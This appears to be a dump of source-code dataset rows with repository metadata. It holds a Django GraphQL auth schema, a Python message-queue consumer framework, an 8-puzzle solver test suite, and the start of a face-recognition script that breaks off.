blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
81fe488a948e2e3eda7a34ae6ffb201f9dc4fae0 | f4552a1e841b54f5f9ed414bc1f2cae1ab6f6adc | /quickstart/quickstart/schema.py | 7c660ac172335215f20504ec878a947dd5d33fee | [
"MIT"
] | permissive | hirokgreen/django-graphql-auth | 9b2a3d09691d0267a48a6cbefe7e49596be823fc | 1d2c745ca4ff189eafaeaf310088797243ae88cd | refs/heads/master | 2021-01-04T08:16:53.447706 | 2020-02-12T13:44:53 | 2020-02-12T13:44:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,320 | py | # quickstart.schema.py
import graphene
from graphql_auth.schema import UserQuery
from graphql_auth import mutations
class AuthMutation(graphene.ObjectType):
    """Root mutation mixin exposing every graphql_auth account/JWT mutation as a GraphQL field."""
    register = mutations.Register.Field()
    verify_account = mutations.VerifyAccount.Field()
    resend_activation_email = mutations.ResendActivationEmail.Field()
    send_password_reset_email = mutations.SendPasswordResetEmail.Field()
    password_reset = mutations.PasswordReset.Field()
    password_change = mutations.PasswordChange.Field()
    archive_account = mutations.ArchiveAccount.Field()
    delete_account = mutations.DeleteAccount.Field()
    update_account = mutations.UpdateAccount.Field()
    send_secondary_email_activation = mutations.SendSecondaryEmailActivation.Field()
    verify_secondary_email = mutations.VerifySecondaryEmail.Field()
    swap_emails = mutations.SwapEmails.Field()
    # django-graphql-jwt authentication
    # with some extra features
    token_auth = mutations.ObtainJSONWebToken.Field()
    verify_token = mutations.VerifyToken.Field()
    refresh_token = mutations.RefreshToken.Field()
    revoke_token = mutations.RevokeToken.Field()
class Query(UserQuery, graphene.ObjectType):
    """Root query type; all user-related queries come from graphql_auth's UserQuery."""
    pass
class Mutation(AuthMutation, graphene.ObjectType):
    """Root mutation type; all fields are inherited from AuthMutation."""
    pass
# The executable schema served by the GraphQL endpoint.
schema = graphene.Schema(query=Query, mutation=Mutation)
| [
"pedrobermoreira@gmail.com"
] | pedrobermoreira@gmail.com |
837eb31dcfcbcdeb39de0bda4bcad87c80626d95 | 993060167ec652fb3cb0c6e0c1da12ba3759ae47 | /function_scheduling_distributed_framework/consumers/base_consumer.py | 60e5c103607c25e878b526726379c9c16f9ad371 | [
"Apache-2.0"
] | permissive | Amua/distributed_framework | f0f85fbcf813991cbc819b28a3309efd8aec320f | 0be0b18f9c494788f8ae65c69863c003988c04ec | refs/heads/master | 2020-07-02T07:30:01.791185 | 2019-08-09T08:11:55 | 2019-08-09T08:11:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,055 | py | # -*- coding: utf-8 -*-
# @Author : ydf
# @Time : 2019/8/8 0008 13:11
import abc
import atexit
import copy
import time
import traceback
from collections import Callable
from functools import wraps
import threading
from threading import Lock, Thread
import eventlet
import gevent
from pymongo.errors import PyMongoError
from function_scheduling_distributed_framework.concurrent_pool.bounded_threadpoolexcutor import BoundedThreadPoolExecutor
from function_scheduling_distributed_framework.concurrent_pool.custom_evenlet_pool_executor import evenlet_timeout_deco, check_evenlet_monkey_patch, CustomEventletPoolExecutor
from function_scheduling_distributed_framework.concurrent_pool.custom_gevent_pool_executor import gevent_timeout_deco, GeventPoolExecutor, check_gevent_monkey_patch
from function_scheduling_distributed_framework.concurrent_pool.custom_threadpool_executor import CustomThreadPoolExecutor, check_not_monkey
from function_scheduling_distributed_framework.consumers.redis_filter import RedisFilter
from function_scheduling_distributed_framework.factories.publisher_factotry import get_publisher
from function_scheduling_distributed_framework.utils import LoggerLevelSetterMixin, LogManager, decorators, nb_print, LoggerMixin
from function_scheduling_distributed_framework.utils import time_util
def delete_keys_and_return_new_dict(dictx: dict, keys: list) -> dict:
    """Return a shallow copy of *dictx* with every key in *keys* removed.

    Only top-level keys (e.g. ``publish_time``) need stripping, so a shallow
    copy is sufficient.  Keys that are absent from the dict are ignored.

    :param dictx: source dict (left unmodified)
    :param keys: top-level keys to drop from the copy
    :return: a new dict without the given keys
    """
    dict_new = copy.copy(dictx)
    for dict_key in keys:
        dict_new.pop(dict_key, None)  # pop with default instead of try/except KeyError
    return dict_new
class ExceptionForRetry(Exception):
    """Raised to force a retry of the consuming function; using this subclass is optional."""
class ExceptionForRequeue(Exception):
    """When the framework catches this error, the message is put back onto the queue."""
class AbstractConsumer(LoggerLevelSetterMixin, metaclass=abc.ABCMeta, ):
    """Skeleton of a queue consumer for the distributed scheduling framework.

    Pulls messages from a broker, throttles and dispatches them to a concurrent
    pool (threads / gevent / eventlet) and runs the user's consuming function
    with retry, acknowledge (confirm) and requeue semantics.  Broker-specific
    subclasses implement ``_shedual_task``, ``_confirm_consume`` and ``_requeue``.
    """
    # Seconds to sleep when the current time falls inside the "do not run" window.
    time_interval_for_check_do_not_run_time = 60
    # Broker identifier; must be set by each concrete subclass.
    BROKER_KIND = None
    @property
    @decorators.synchronized
    def publisher_of_same_queue(self):
        # Lazily create a publisher bound to the same queue/broker; used for
        # requeueing messages and for querying the remaining message count.
        if not self._publisher_of_same_queue:
            self._publisher_of_same_queue = get_publisher(self._queue_name, broker_kind=self.BROKER_KIND)
            if self._msg_expire_senconds:
                self._publisher_of_same_queue.set_is_add_publish_time()
        return self._publisher_of_same_queue
    @classmethod
    def join_shedual_task_thread(cls):
        """Join all scheduling threads/greenlets; see the usage example below.

        :return:
        """
        """
        def ff():
            RabbitmqConsumer('queue_test', consuming_function=f3, threads_num=20, msg_schedule_time_intercal=2, log_level=10, logger_prefix='yy平台消费', is_consuming_function_use_multi_params=True).start_consuming_message()
            RabbitmqConsumer('queue_test2', consuming_function=f4, threads_num=20, msg_schedule_time_intercal=4, log_level=10, logger_prefix='zz平台消费', is_consuming_function_use_multi_params=True).start_consuming_message()
            AbstractConsumer.join_shedual_task_thread()            # 如果开多进程启动消费者,在linux上需要这样写下这一行。
        if __name__ == '__main__':
            [Process(target=ff).start() for _ in range(4)]
        """
        ConcurrentModeDispatcher.join()
    def __init__(self, queue_name, *, consuming_function: Callable = None, function_timeout=0, threads_num=50, specify_threadpool=None, concurrent_mode=1,
                 max_retry_times=3, log_level=10, is_print_detail_exception=True, msg_schedule_time_intercal=0.0, msg_expire_senconds=0,
                 logger_prefix='', create_logger_file=True, do_task_filtering=False, is_consuming_function_use_multi_params=True,
                 is_do_not_run_by_specify_time_effect=False, do_not_run_by_specify_time=('10:00:00', '22:00:00'), schedule_tasks_on_main_thread=False):
        """
        :param queue_name: name of the queue to consume from
        :param consuming_function: the function that processes each message.
        :param function_timeout: timeout in seconds; the function is killed when it runs longer.  0 means no limit.
        :param threads_num: size of the concurrent pool
        :param specify_threadpool: use the given pool (several consumers may share one); when not None, threads_num is ignored
        :param concurrent_mode: concurrency mode, currently threads / gevent / eventlet: 1 thread, 2 gevent, 3 eventlet
        :param max_retry_times: maximum number of retries for a failing task
        :param log_level: logging level
        :param is_print_detail_exception: log the full traceback for task errors
        :param msg_schedule_time_intercal: interval between scheduling two messages, used for rate limiting
        :param msg_expire_senconds: discard messages published more than this many seconds ago (0 disables expiry)
        :param logger_prefix: logger-name prefix so different consumers write distinct logs
        :param create_logger_file: whether to also log to a file
        :param do_task_filtering: filter out tasks (keyed by function arguments) that already ran successfully
        :param is_consuming_function_use_multi_params: True if the function takes classic multiple parameters; False if it takes one body dict
        :param is_do_not_run_by_specify_time_effect: whether the "do not run" time window is active
        :param do_not_run_by_specify_time: the daily time window during which the consumer must not run
        :param schedule_tasks_on_main_thread: schedule tasks directly on the main thread, which means two consumers cannot be started in the same main thread
        """
        self._queue_name = queue_name
        self.queue_name = queue_name  # public alias to avoid protected-access warnings for external users
        self.consuming_function = consuming_function
        self._function_timeout = function_timeout
        self._threads_num = threads_num
        self._specify_threadpool = specify_threadpool
        self._threadpool = None  # the pool gets one extra worker for the message-count/heartbeat checker thread
        self._concurrent_mode = concurrent_mode
        self._max_retry_times = max_retry_times
        self._is_print_detail_exception = is_print_detail_exception
        self._msg_schedule_time_intercal = msg_schedule_time_intercal if msg_schedule_time_intercal > 0.001 else 0.001
        self._msg_expire_senconds = msg_expire_senconds
        if self._concurrent_mode not in (1, 2, 3):
            raise ValueError('设置的并发模式不正确')
        self._concurrent_mode_dispatcher = ConcurrentModeDispatcher(self)
        self._logger_prefix = logger_prefix
        self._log_level = log_level
        if logger_prefix != '':
            logger_prefix += '--'
        logger_name = f'{logger_prefix}{self.__class__.__name__}--{self._concurrent_mode_dispatcher.concurrent_name}--{queue_name}'
        # nb_print(logger_name)
        self.logger = LogManager(logger_name).get_logger_and_add_handlers(log_level, log_filename=f'{logger_name}.log' if create_logger_file else None)
        self.logger.info(f'{self.__class__} 被实例化')
        self._do_task_filtering = do_task_filtering
        self._redis_filter_key_name = f'filter:{queue_name}'
        self._redis_filter = RedisFilter(self._redis_filter_key_name)
        self._is_consuming_function_use_multi_params = is_consuming_function_use_multi_params
        self._lock_for_pika = Lock()
        self._execute_task_times_every_minute = 0  # number of tasks executed during the current minute
        self._lock_for_count_execute_task_times_every_minute = Lock()
        self._current_time_for_execute_task_times_every_minute = time.time()
        self._msg_num_in_broker = 0
        self._last_timestamp_when_has_task_in_queue = 0
        self._last_timestamp_print_msg_num = 0
        self._is_do_not_run_by_specify_time_effect = is_do_not_run_by_specify_time_effect
        self._do_not_run_by_specify_time = do_not_run_by_specify_time  # optional daily window during which consuming is paused
        self._schedule_tasks_on_main_thread = schedule_tasks_on_main_thread
        self.stop_flag = False
        self._publisher_of_same_queue = None
    @property
    @decorators.synchronized
    def threadpool(self):
        # Built lazily by the dispatcher so the pool type matches the concurrency mode.
        return self._concurrent_mode_dispatcher.build_pool()
    def keep_circulating(self, time_sleep=0.001, exit_if_function_run_sucsess=False, is_display_detail_exception=True):
        """Decorator factory that keeps calling the wrapped function in a loop with a fixed pause.

        :param time_sleep: pause between consecutive calls
        :param is_display_detail_exception: log the full traceback instead of only str(e)
        :param exit_if_function_run_sucsess: leave the loop (returning the result) after the first successful call
        """
        def _keep_circulating(func):
            # noinspection PyBroadException
            @wraps(func)
            def __keep_circulating(*args, **kwargs):
                while 1:
                    if self.stop_flag:
                        break
                    try:
                        result = func(*args, **kwargs)
                        if exit_if_function_run_sucsess:
                            return result
                    except Exception as e:
                        msg = func.__name__ + ' 运行出错\n ' + traceback.format_exc(limit=10) if is_display_detail_exception else str(e)
                        self.logger.error(msg)
                    finally:
                        time.sleep(time_sleep)
            return __keep_circulating
        return _keep_circulating
    def start_consuming_message(self):
        # Start the heartbeat/message-count checker in the pool, then run the
        # broker-specific scheduling loop on the main thread or in the background.
        self.logger.warning(f'开始消费 {self._queue_name} 中的消息')
        # self.threadpool.submit(decorators.keep_circulating(20)(self.check_heartbeat_and_message_count))
        self.threadpool.submit(self.keep_circulating(20)(self.check_heartbeat_and_message_count))
        if self._schedule_tasks_on_main_thread:
            # decorators.keep_circulating(1)(self._shedual_task)()
            self.keep_circulating(1)(self._shedual_task)()
        else:
            # t = Thread(target=decorators.keep_circulating(1)(self._shedual_task))
            self._concurrent_mode_dispatcher.schedulal_task_with_no_block()
    @abc.abstractmethod
    def _shedual_task(self):
        # Broker-specific loop that fetches messages and feeds them to _submit_task.
        raise NotImplementedError
    def _run_consuming_function_with_confirm_and_retry(self, kw: dict, current_retry_times=0, ):
        """Run the consuming function for one message, acknowledging on success and retrying on failure."""
        if self._do_task_filtering and self._redis_filter.check_value_exists(kw['body']):  # filter out tasks whose arguments already ran successfully
            self.logger.info(f'redis的 [{self._redis_filter_key_name}] 键 中 过滤任务 {kw["body"]}')
            self._confirm_consume(kw)
            return
        with self._lock_for_count_execute_task_times_every_minute:
            self._execute_task_times_every_minute += 1
            if time.time() - self._current_time_for_execute_task_times_every_minute > 60:
                self.logger.info(
                    f'一分钟内执行了 {self._execute_task_times_every_minute} 次函数 [ {self.consuming_function.__name__} ] ,预计'
                    f'还需要 {time_util.seconds_to_hour_minute_second(self._msg_num_in_broker / self._execute_task_times_every_minute * 60)} 时间'
                    f'才能执行完成 {self._msg_num_in_broker}个剩余的任务 ')
                self._current_time_for_execute_task_times_every_minute = time.time()
                self._execute_task_times_every_minute = 0
        if current_retry_times < self._max_retry_times + 1:
            # noinspection PyBroadException
            t_start = time.time()
            try:
                function_run = self.consuming_function if self._function_timeout == 0 else self._concurrent_mode_dispatcher.timeout_deco(self._function_timeout)(self.consuming_function)
                if self._is_consuming_function_use_multi_params:  # the consuming function takes classic multiple parameters
                    function_run(**delete_keys_and_return_new_dict(kw['body'], ['publish_time', 'publish_time_format']))
                else:
                    function_run(delete_keys_and_return_new_dict(kw['body'], ['publish_time', 'publish_time_format']))  # the consuming function takes one dict whose key/value pairs are the parameters
                self._confirm_consume(kw)
                if self._do_task_filtering:
                    self._redis_filter.add_a_value(kw['body'])  # on success, record the sorted key/value string of the arguments in the filter set
                # self.logger.debug(f'{self._concurrent_mode_dispatcher.get_concurrent_info()} 函数 {self.consuming_function.__name__} '
                #                   f'第{current_retry_times + 1}次 运行, 正确了,函数运行时间是 {round(time.time() - t_start, 4)} 秒,入参是 【 {kw["body"]} 】')
                self.logger.debug(f' 函数 {self.consuming_function.__name__} '
                                  f'第{current_retry_times + 1}次 运行, 正确了,函数运行时间是 {round(time.time() - t_start, 4)} 秒,入参是 【 {kw["body"]} 】。 {self._concurrent_mode_dispatcher.get_concurrent_info()}')
            except Exception as e:
                if isinstance(e, (PyMongoError, ExceptionForRequeue)):  # mongo can be briefly unavailable (e.g. during maintenance), and user code may raise ExceptionForRequeue on purpose; either way the message is requeued, unconstrained by the retry limit
                    self.logger.critical(f'函数 [{self.consuming_function.__name__}] 中发生错误 {type(e)}  {e}')
                    return self._requeue(kw)
                self.logger.error(f'函数 {self.consuming_function.__name__}  第{current_retry_times + 1}次发生错误,'
                                  f'函数运行时间是 {round(time.time() - t_start, 4)} 秒,\n  入参是 【 {kw["body"]} 】   \n 原因是 {type(e)} {e} ', exc_info=self._is_print_detail_exception)
                self._run_consuming_function_with_confirm_and_retry(kw, current_retry_times + 1)
        else:
            self.logger.critical(f'函数 {self.consuming_function.__name__} 达到最大重试次数 {self._max_retry_times} 后,仍然失败, 入参是 【 {kw["body"]} 】')  # after exceeding the retry limit the message is acknowledged anyway
            self._confirm_consume(kw)
    @abc.abstractmethod
    def _confirm_consume(self, kw):
        """Acknowledge (confirm) consumption of the message in the broker."""
        raise NotImplementedError
    # noinspection PyUnusedLocal
    def check_heartbeat_and_message_count(self):
        # Poll the broker for the remaining message count; log it at most once a minute.
        self._msg_num_in_broker = self.publisher_of_same_queue.get_message_count()
        if time.time() - self._last_timestamp_print_msg_num > 60:
            self.logger.info(f'[{self._queue_name}] 队列中还有 [{self._msg_num_in_broker}] 个任务')
            self._last_timestamp_print_msg_num = time.time()
        if self._msg_num_in_broker != 0:
            self._last_timestamp_when_has_task_in_queue = time.time()
        return self._msg_num_in_broker
    @abc.abstractmethod
    def _requeue(self, kw):
        """Put the message back onto the queue."""
        raise NotImplementedError
    def _submit_task(self, kw):
        # Requeue and sleep while inside the "do not run" window; drop expired
        # messages; otherwise hand the task to the pool and throttle scheduling.
        if self._judge_is_daylight():
            self._requeue(kw)
            time.sleep(self.time_interval_for_check_do_not_run_time)
            return
        if self._msg_expire_senconds != 0 and time.time() - self._msg_expire_senconds > kw['body']['publish_time']:
            self.logger.warning(f'消息发布时戳是 {kw["body"]["publish_time"]} {kw["body"].get("publish_time_format", "")},距离现在 {round(time.time() - kw["body"]["publish_time"], 4)} 秒 ,'
                                f'超过了指定的 {self._msg_expire_senconds} 秒,丢弃任务')
            self._confirm_consume(kw)
            return 0
        self.threadpool.submit(self._run_consuming_function_with_confirm_and_retry, kw)
        time.sleep(self._msg_schedule_time_intercal)
    def _judge_is_daylight(self):
        # True when the "do not run" window is enabled and the current time is inside it.
        if self._is_do_not_run_by_specify_time_effect and self._do_not_run_by_specify_time[0] < time_util.DatetimeConverter().time_str < self._do_not_run_by_specify_time[1]:
            self.logger.warning(f'现在时间是 {time_util.DatetimeConverter()} ,现在时间是在 {self._do_not_run_by_specify_time} 之间,不运行')
            return True
    def __str__(self):
        return f'队列为 {self.queue_name} 函数为 {self.consuming_function} 的消费者'
# noinspection PyProtectedMember
class ConcurrentModeDispatcher(LoggerMixin):
    """Maps the consumer's concurrent_mode (1 thread / 2 gevent / 3 eventlet)
    onto the matching pool class, timeout decorator and scheduling strategy."""
    schedulal_thread_to_be_join = []  # scheduling threads/greenlets to join at exit
    concurrent_mode = None  # interpreter-wide mode; only one mode is allowed per process
    schedual_task_always_use_thread = False
    def __init__(self, consumerx: AbstractConsumer):
        self.consumer = consumerx
        # Mixing modes in one interpreter is rejected (monkey patching makes them exclusive).
        if self.__class__.concurrent_mode is not None and self.consumer._concurrent_mode != self.__class__.concurrent_mode:
            raise ValueError('同一解释器中不可以设置两种并发类型')
        self._concurrent_mode = self.__class__.concurrent_mode = self.consumer._concurrent_mode
        concurrent_name = ''
        self.timeout_deco = None
        if self._concurrent_mode == 1:
            concurrent_name = 'thread'
            self.timeout_deco = decorators.timeout
        elif self._concurrent_mode == 2:
            concurrent_name = 'gevent'
            self.timeout_deco = gevent_timeout_deco
        elif self._concurrent_mode == 3:
            concurrent_name = 'evenlet'
            self.timeout_deco = evenlet_timeout_deco
        self.concurrent_name = concurrent_name
        self.logger.warning(f'{self.consumer} 设置并发模式为 {self.concurrent_name}')
    def build_pool(self):
        """Build (once) and return the pool matching the concurrency mode."""
        if self.consumer._threadpool:
            return self.consumer._threadpool
        pool_type = None  # the three pool classes are duck types modeled on ThreadPoolExecutor: same public method names and behaviour, freely interchangeable
        if self._concurrent_mode == 1:
            pool_type = CustomThreadPoolExecutor
            # pool_type = BoundedThreadPoolExecutor
            check_not_monkey()
        elif self._concurrent_mode == 2:
            pool_type = GeventPoolExecutor
            check_gevent_monkey_patch()
        elif self._concurrent_mode == 3:
            pool_type = CustomEventletPoolExecutor
            check_evenlet_monkey_patch()
        self.consumer._threadpool = self.consumer._specify_threadpool if self.consumer._specify_threadpool else pool_type(self.consumer._threads_num + 1)  # one extra worker for the message-count/heartbeat checker thread
        self.logger.warning(f'{self.concurrent_name} {self.consumer._threadpool}')
        return self.consumer._threadpool
    def schedulal_task_with_no_block(self):
        # Start the consumer's scheduling loop in the background (thread or greenlet,
        # depending on mode) and remember it so it can be joined at exit.
        if self.schedual_task_always_use_thread:
            t = Thread(target=self.consumer.keep_circulating(1)(self.consumer._shedual_task))
            self.__class__.schedulal_thread_to_be_join.append(t)
            t.start()
        else:
            if self._concurrent_mode == 1:
                t = Thread(target=self.consumer.keep_circulating(1)(self.consumer._shedual_task))
                self.__class__.schedulal_thread_to_be_join.append(t)
                t.start()
            elif self._concurrent_mode == 2:
                g = gevent.spawn(self.consumer.keep_circulating(1)(self.consumer._shedual_task), )
                self.__class__.schedulal_thread_to_be_join.append(g)
            elif self._concurrent_mode == 3:
                g = eventlet.spawn(self.consumer.keep_circulating(1)(self.consumer._shedual_task), )
                self.__class__.schedulal_thread_to_be_join.append(g)
        atexit.register(self.join)
    @classmethod
    def join(cls):
        # Block until every registered scheduling thread/greenlet has finished.
        nb_print((cls.schedulal_thread_to_be_join, len(cls.schedulal_thread_to_be_join), '模式:', cls.concurrent_mode))
        if cls.schedual_task_always_use_thread:
            for t in cls.schedulal_thread_to_be_join:
                nb_print(t)
                t.join()
        else:
            if cls.concurrent_mode == 1:
                for t in cls.schedulal_thread_to_be_join:
                    nb_print(t)
                    t.join()
            elif cls.concurrent_mode == 2:
                # cls.logger.info()
                nb_print(cls.schedulal_thread_to_be_join)
                gevent.joinall(cls.schedulal_thread_to_be_join, raise_error=True, )
            elif cls.concurrent_mode == 3:
                for g in cls.schedulal_thread_to_be_join:
                    # eventlet.greenthread.GreenThread.
                    nb_print(g)
                    g.wait()
    def get_concurrent_info(self):
        # Human-readable snapshot of the current thread/greenlet for log messages.
        concurrent_info = ''
        if self._concurrent_mode == 1:
            concurrent_info = f'[{threading.current_thread()}  {threading.active_count()}]'
        elif self._concurrent_mode == 2:
            concurrent_info = f'[{gevent.getcurrent()}  {threading.active_count()}]'
        elif self._concurrent_mode == 3:
            # noinspection PyArgumentList
            concurrent_info = f'[{eventlet.getcurrent()} {threading.active_count()}]'
        return concurrent_info
def wait_for_possible_has_finish_all_tasks(queue_name: str, minutes: int, send_stop_to_broker=0, broker_kind: int = 0, ):
    """Heuristically wait until a queue has *probably* been fully consumed.

    Consumption is asynchronous: messages may be pushed while others are
    consumed, and a few tail tasks may still be awaiting acknowledgement, so
    this check is imprecise.  The queue is considered finished once it reports
    0 messages continuously for *minutes* minutes.  Understand the caveats
    before relying on it.

    :param queue_name: queue name
    :param minutes: consecutive minutes without tasks that counts as "finished"
    :param send_stop_to_broker: publish a stop flag to the broker, causing
        consumers to break out of their scheduling loop
    :param broker_kind: kind of message broker
    :return:
    """
    if minutes <= 1:
        raise ValueError('疑似完成任务,判断时间最少需要设置为2分钟内,最好是是10分钟')
    pb = get_publisher(queue_name, broker_kind=broker_kind)
    no_task_time = 0
    while 1:
        # noinspection PyBroadException
        try:
            message_count = pb.get_message_count()
        except Exception as e:
            nb_print(e)
            message_count = -1  # broker error -> treated as "tasks still present", resetting the idle timer below
        if message_count == 0:
            no_task_time += 30
        else:
            no_task_time = 0
        time.sleep(30)
        if no_task_time > minutes * 60:
            break
    if send_stop_to_broker:
        pb.publish({'stop': 1})
    pb.close()
| [
"909686719@qq.com"
] | 909686719@qq.com |
9460ed333c68286b1b8586ae62dfef6f5a885477 | c51346bab049a960d76f9e2e243523840bf5bd7a | /driver_testsuite.py | 406a7e5bec66ecc570edc64504cdcee78201bbc4 | [] | no_license | DaFaYo/8-puzzle | 9d90fa8f23d49f718411280d4a8a4a0fd2d360d9 | 8a2a69e00ee9ea5d705cf8427114d1c8d62f276d | refs/heads/master | 2021-07-07T05:51:12.230212 | 2017-10-04T10:47:49 | 2017-10-04T10:47:49 | 105,752,126 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,199 | py | """
A simple testing suite for 8-puzzle, 15-puzzle, 24-puzzle, etc.
"""
import poc_simpletest
import time
total_time = 0.0
def timeTest(testName, timeElapsed):
    """Accumulate timeElapsed into the module-wide total_time and return a report line."""
    global total_time
    total_time = total_time + timeElapsed
    report = "%s. Time elapsed: %.3f s." % (testName, timeElapsed)
    return report
def run_test(solver_class, manhattan_func):
    """Exercise manhattan_func and solver_class ('bfs'/'dfs'/'ast') against known 8-puzzle cases.

    NOTE: this file is Python 2 (print statements, list-returning map).
    """
    # -----------------------------------------------------------
    # test manhattan distance function with 8-puzzle
    # -----------------------------------------------------------
    suite = poc_simpletest.TestSuite()
    function = 'manhattan distance'
    start = '7,2,4,5,0,6,8,3,1'
    goal = '0,1,2,3,4,5,6,7,8'
    print 'Goal:', goal
    testName = "Test #1: function: %s, start: %s" % (function, start)
    start = map(int, start.split(","))
    goal = map(int, goal.split(","))
    dist = manhattan_func(start, goal, 3)
    suite.run_test(dist, 18, testName)
    print testName
    start = '1,2,5,3,4,0,6,7,8'
    testName = "Test #2: function: %s, start: %s" % (function, start)
    start = map(int, start.split(","))
    dist = manhattan_func(start, goal, 3)
    suite.run_test(dist, 3, testName)
    print testName
    start = '3,1,2,0,4,5,6,7,8'
    testName = "Test #3: function: %s, start: %s" % (function, start)
    start = map(int, start.split(","))
    dist = manhattan_func(start, goal, 3)
    suite.run_test(dist, 1, testName)
    print testName
    start = '8,6,4,2,1,3,5,7,0'
    testName = "Test #4: function: %s, start: %s" % (function, start)
    start = map(int, start.split(","))
    dist = manhattan_func(start, goal, 3)
    suite.run_test(dist, 18, testName)
    print testName
    start = '8,4,0,3,7,1,6,2,5'
    testName = "Test #5: function: %s, start: %s" % (function, start)
    start = map(int, start.split(","))
    dist = manhattan_func(start, goal, 3)
    suite.run_test(dist, 12, testName)
    print testName
    ##############
    # TEST SOLVER
    ##############
    #solve the 8-puzzle
    goal = '0,1,2,3,4,5,6,7,8'
    # -------------------------------------------------------------
    # test solver with 8-puzzle with breadth-first-search algorithm
    # -------------------------------------------------------------
    board = '3,1,2,0,4,5,6,7,8'
    testName = "Test #6 t/m #8: sanity checks, board: %s" % (board)
    print testName
    solver = solver_class('bfs', board)
    solver.goalTest(goal)
    path = solver.get_path()
    suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Up }', testName)
    solver = solver_class('dfs', board)
    solver.goalTest(goal)
    path = solver.get_path()
    suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Up }', testName)
    solver = solver_class('ast', board)
    solver.goalTest(goal)
    path = solver.get_path()
    suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Up }', testName)
    method = 'bfs'
    board = '1,2,5,3,4,0,6,7,8'
    testName = "Test #9: method: %s, board: %s" % (method, board)
    # time the solver
    start = time.time()
    solver = solver_class(method, board)
    solver.goalTest(goal)
    end = time.time()
    path = solver.get_path()
    suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Up, Left, Left }', testName)
    print timeTest(testName, (end - start))
    method = 'ast'
    board = '1,2,5,3,4,0,6,7,8'
    testName = "Test #10: method: %s, board: %s" % (method, board)
    # time the solver
    start = time.time()
    solver = solver_class(method, board)
    solver.goalTest(goal)
    end = time.time()
    path = solver.get_path()
    suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Up, Left, Left }', testName)
    print timeTest(testName, (end - start))
    board = '6,3,4,7,1,8,2,0,5'
    testName = "Test #11: method: %s, board: %s" % (method, board)
    start = time.time()
    solver = solver_class(method, board)
    solver.goalTest(goal)
    end = time.time()
    path = solver.get_path()
    suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Left, Up, Up, Right, Down, Down, Right, Up, ' \
                   'Left, Down, Left, Up, Up, Right, Right, Down, Left, Up, Left }', testName)
    print timeTest(testName, (end - start))
    board = '4,5,6,1,2,0,8,7,3'
    testName = "Test #12: method: %s, board: %s" % (method, board)
    start = time.time()
    solver = solver_class(method, board)
    solver.goalTest(goal)
    end = time.time()
    path = solver.get_path()
    suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Up, Left, Down, Down, Left, Up, Right, Right, ' \
                   'Down, Left, Up, Left, Down, Right, Up, Right, Up, Left, Left, Down, Right, Up, Left }', testName)
    print timeTest(testName, (end - start))
    # -----------------------------------------------------------
    # test solver with 8-puzzle with depth-first-search algorithm
    # -----------------------------------------------------------
    method = 'dfs'
    board = '1,2,5,3,4,0,6,7,8'
    testName = "Test #13: method: %s, board: %s" % (method, board)
    # time the solver
    start = time.time()
    solver = solver_class(method, board)
    solver.goalTest(goal)
    end = time.time()
    path = solver.get_path()
    suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Up, Left, Left }', testName)
    print timeTest(testName, (end - start))
    # -----------------------------------------------------------
    # test solver with 8-puzzle with A* algorithm
    # -----------------------------------------------------------
    method = 'ast'
    board = '6,1,8,4,0,2,7,3,5'
    testName = "Test #14: method: %s, board: %s" % (method, board)
    # time the solver
    start = time.time()
    solver = solver_class(method, board)
    solver.goalTest(goal)
    end = time.time()
    path = solver.get_path()
    suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Down, Right, Up, Up, Left, Down, Right, Down, ' \
                   'Left, Up, Left, Up, Right, Right, Down, Down, Left, Left, Up, Up }', testName)
    print timeTest(testName, (end - start))
    # -----------------------------------------------------------
    # test solver with 8-puzzle with A* algorithm
    # -----------------------------------------------------------
    method = 'ast'
    board = '6,3,4,7,1,8,2,0,5'
    testName = "Test #15: method: %s, board: %s" % (method, board)
    # time the solver
    start = time.time()
    solver = solver_class(method, board)
    solver.goalTest(goal)
    end = time.time()
    path = solver.get_path()
    suite.run_test('{ %s }' % (', '.join(str(e) for e in path)), '{ Left, Up, Up, Right, Down, Down, Right, Up, ' \
                   'Left, Down, Left, Up, Up, Right, Right, Down, Left, Up, Left }', testName)
    print timeTest(testName, (end - start))
    print
    print "Total time: %.3f seconds." % (total_time)
    suite.report_results()
| [
"rosahoetmer@MacBook-Pro-van-Rosa.local"
] | rosahoetmer@MacBook-Pro-van-Rosa.local |
478dcea69606ef521a881ced468c30ce6dbc92fc | 228d7661748502381e8a075c7604f7e289069499 | /store_img.py | d7916e1ea051d7a8364667e2cf0325bcbfdda643 | [] | no_license | pritul2/Face-Recognition | ba18f04083db86815bd66ced6c811e8141569dd3 | 5958e73356e31c6262b65b1ed44eda64f716cc10 | refs/heads/master | 2021-05-21T15:58:03.147498 | 2020-04-15T15:13:18 | 2020-04-15T15:13:18 | 252,706,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,784 | py | from keras import backend as K
import cv2
import tensorflow as tf
from keras.models import load_model
from mtcnn.mtcnn import MTCNN
import compare_file
def detect(img):
    """Detect the first face in a BGR frame with MTCNN; return the cropped,
    equalized grayscale face (via extract), or None when no face is found
    with confidence >= 0.5."""
